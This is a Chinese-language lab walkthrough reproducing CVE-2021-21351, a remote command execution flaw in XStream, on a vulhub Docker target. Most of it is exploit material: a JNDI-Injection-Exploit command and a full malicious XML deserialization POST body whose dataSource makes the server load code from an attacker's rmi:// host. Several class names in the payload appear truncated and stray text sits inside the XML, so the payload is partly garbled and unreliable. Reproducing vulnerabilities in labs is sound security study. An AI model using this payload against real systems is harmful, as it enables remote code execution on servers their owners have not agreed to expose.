XStream反序列化远程命令执⾏漏洞复现(CVE-2021-21351)XStream 反序列化远程命令执⾏漏洞复现
1. 漏洞影响版本
XStream <= 1.4.15
2. 环境搭建
安装漏洞靶场vulhub
git clone git://github/vulhub/vulhub.git
3. 漏洞复现
1 进⼊到漏洞环境⽂件夹,启动漏洞环境。
cd /vulhub/xstream/CVE-2021-21351
docker-compose up -d
2 启动好之后,访问靶机的ip加8080端⼝
3 下载JNDI注⼊利⽤⼯具:
下载地址:github/welk1n/JNDI-Injection-Exploit/releases
4 打开burp,设置好代理,抓包
1. 设置代理
2. 设置好代理之后,访问⽹站进⾏抓包(可以右键发送到Repeater)
5 启动下载的JNDI注⼊利⽤⼯具(复制出图中红框中的信息)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /" -A 10.44.28.91
注意: -A的地址填写攻击机的IP,也就是你的PC主机。
6 修改请求的数据包:将第5步复制出来的信息粘贴到< dataSource>这⼀⾏中。
POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close
Content-Type: application/xml
Content-Length: 3182
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='apache.xpath.internal.objects.XRTreeFrag'>
<m__DTMXRTreeFrag>
<m__dtm class='l.f.sax2dtm.SAX2DTM'>
<m__size>-10086</m__size>
<m__mgrDefault>
<__overrideDefaultParser>false</__overrideDefaultParser>
<m__incremental>false</m__incremental>
<m__source__location>false</m__source__location>
<m__dtms>
cve漏洞库<null/>
</m__dtms>
<m__defaultHandler/>
</m__mgrDefault>
<m__shouldStripWS>false</m__shouldStripWS>
<m__indexing>false</m__indexing>
<m__incrementalSAXSource class='l.f.IncrementalSAXSource_Xerces'>
<fPullParserConfig class='wset.JdbcRowSetImpl'serialization='custom'>
<wset.BaseRowSet>
<default>
<concurrency>1008</concurrency>
<escapeProcessing>true</escapeProcessing>
<fetchDir>1000</fetchDir>
<fetchSize>0</fetchSize>
<isolation>2</isolation>
<maxFieldSize>0</maxFieldSize>
<maxRows>0</maxRows>
<queryTimeout>0</queryTimeout>
<readOnly>true</readOnly>
<rowSetType>1004</rowSetType>
<showDeleted>false</showDeleted>
<dataSource>rmi://10.44.28.91:1099/dg33cm</dataSource>
<listeners/>
<params/>
</default>
</wset.BaseRowSet>
<wset.JdbcRowSetImpl>
<default/>
</wset.JdbcRowSetImpl>
</fPullParserConfig>
<fConfigSetInput>
<class>wset.JdbcRowSetImpl</class>
<name>setAutoCommit</name>
<parameter-types>
<class>boolean</class>
</parameter-types>
</fConfigSetInput>
<fConfigParse reference='../fConfigSetInput'/>
<fParseInProgress>false</fParseInProgress>
</m__incrementalSAXSource>
<m__walker>
<nextIsRaw>false</nextIsRaw>
</m__walker>
<m__endDocumentOccured>false</m__endDocumentOccured>
<m__idAttributes/>
<m__textPendingStart>-1</m__textPendingStart>
<m__useSourceLocationProperty>false</m__useSourceLocationProperty> <m__pastFirstElement>false</m__pastFirstElement>
</m__dtm>
<m__dtmIdentity>1</m__dtmIdentity>
</m__DTMXRTreeFrag>
<m__dtmRoot>1</m__dtmRoot>
<m__allowRelease>false</m__allowRelease>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
7 点击Go 发送请求,然后去docker中查看tmp⽬录下是否创建了⽂件(如果创建了说明上⾯写的代码被服务端执⾏了)
8、总结,XStream是⼀个Java类库,⽤来将对象序列化成XML (JSON)或反序列化为对象,攻击者可以操纵处理过的输⼊流并替换或注⼊对象,从⽽执⾏从远程服务器加载的任意代码,建议⽤户升级⾄最新版本。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。